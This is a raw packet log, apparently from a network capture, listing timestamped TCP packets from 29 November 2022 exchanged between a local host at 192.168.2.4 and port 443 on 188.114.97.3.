                                  Nov 29, 2022 16:55:22.668279886 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.668735027 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.672946930 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.672976017 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956020117 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956254005 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956289053 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956320047 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956382990 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.956428051 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956449032 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.956566095 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956598997 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956613064 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.956629992 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956665993 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956700087 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956705093 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.956720114 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.956764936 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.957380056 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.957432032 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.957461119 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.957509041 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.957536936 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.957617998 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.958194971 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.958230019 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.958277941 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.958302975 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.958995104 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.959028006 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.959054947 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.959093094 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.959120989 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.959145069 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.959198952 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.959742069 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.959830046 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.959855080 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.959883928 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.959906101 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.961472988 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.967278004 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.972688913 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.972729921 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.972760916 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.972793102 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.972816944 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.972848892 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.972867012 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.972953081 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.973404884 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.973462105 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.973490953 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.973521948 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.973534107 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.974250078 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.974303961 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.974319935 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.974330902 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.974342108 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.975075006 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.975111961 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.975172043 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.975189924 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.975759983 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.975836992 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.975847006 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.976495981 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.976531982 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.976569891 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.976583958 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.976598978 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.977060080 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.977180004 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.977191925 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.977948904 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.978034019 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.978046894 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.978665113 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.978750944 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.978765011 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.979441881 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.979533911 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.979547977 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.980221033 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.980256081 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.981118917 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.983637094 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.983637094 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.983637094 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.983674049 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.989646912 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.989732981 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.989785910 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.989825964 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.989852905 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.990129948 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.990226030 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.990242004 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.990636110 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.990694046 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.990698099 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.990720987 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.990756035 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.990824938 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.991492987 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.991616964 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.992312908 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.992413998 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.992433071 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.992501974 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.993079901 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.993154049 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.993968964 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.994045019 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.994069099 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.994121075 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.994729042 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.994937897 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.995537996 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.995614052 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.995628119 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.995687962 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.996359110 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.996438026 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.997198105 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.997262955 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.997293949 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.997307062 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.997334003 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.997350931 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.997984886 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.998070955 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.998090029 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.998147964 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.998811960 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.998897076 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.998910904 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.998980999 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:22.999819994 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:22.999902010 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.000647068 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.000714064 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.000754118 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.000773907 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.000807047 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.001616001 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.001681089 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.001698017 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.001708984 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.001750946 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.002489090 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.002563000 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.002562046 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.002602100 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.002646923 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.003396988 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.003468990 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.003470898 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.003489971 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.003611088 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.004544020 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.004962921 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.005059958 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.005140066 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.005155087 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.005203009 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.006320000 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.006544113 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.006604910 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.006652117 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.006685972 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.006701946 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.006730080 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.006747007 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.007164001 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.007390976 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.007884979 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.007927895 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.007961988 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.007983923 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.008012056 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.008024931 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.008390903 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.008738995 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.009007931 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.009054899 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.009097099 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.009109020 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.009155035 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.009490013 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.009898901 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.010643959 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.010687113 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.010767937 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.010785103 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.010804892 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.010837078 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.011615038 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.011682034 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.011737108 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.011771917 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.011791945 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.011831999 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.011854887 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.012451887 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.013288975 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.013324022 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.013403893 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.013417959 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.013448000 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.013468027 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.013690948 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.014512062 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.014544010 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.014584064 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.014611006 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.014635086 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.015358925 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.015450954 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.015480995 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.015530109 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.015547991 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.015604973 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.015630960 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.017303944 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.017359972 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.017410994 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.017431974 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.017447948 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.017467022 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.018201113 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.018301964 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.018301964 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.018323898 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.018345118 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.018376112 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.018388987 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.019505978 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.019546032 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.019642115 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.019669056 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.019685984 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.020591974 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.020724058 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.020831108 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.020832062 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.020850897 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.020884037 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.020912886 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.021712065 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.021752119 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.021842003 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.021863937 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.021899939 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.021929026 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.027122021 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.027168989 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.027244091 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.027276993 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.027306080 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.027328968 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.027345896 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.027360916 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.027410030 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.027447939 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.027451992 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.027466059 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.027514935 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.027561903 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.027616978 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.027622938 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.027642012 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.027671099 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.027679920 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.027695894 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.027707100 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.027739048 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.027749062 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.027770996 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.027776003 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.027793884 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.027806044 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.027832985 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.027853012 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.027863026 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.027887106 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.027925968 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.027930975 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.027946949 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.027971029 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.027987003 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.027997017 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.028016090 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.028017998 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.028053045 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.028053999 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.028068066 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.028090954 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.028131008 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.028223038 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.028729916 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.028769016 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.028825045 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.028844118 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.028861046 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.029056072 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.029097080 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.029126883 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.029136896 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.029165030 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.029223919 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.029894114 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.029932022 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.030013084 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.030031919 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.030050039 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.030071974 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.030741930 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.030781031 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.030857086 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.030872107 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.030905962 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.030926943 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.031285048 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.031323910 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.031368017 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.031377077 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.031435966 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.031485081 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.031518936 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.031594992 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.031594992 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.031605959 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.032115936 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.032146931 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.032412052 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.032445908 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.032510042 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.032520056 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.032552958 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.032568932 CET49697443192.168.2.4188.114.97.3
                                  Nov 29, 2022 16:55:23.032568932 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.032591105 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.032620907 CET44349697188.114.97.3192.168.2.4
                                  Nov 29, 2022 16:55:23.032634974 CET49697443192.168.2.4188.114.97.3
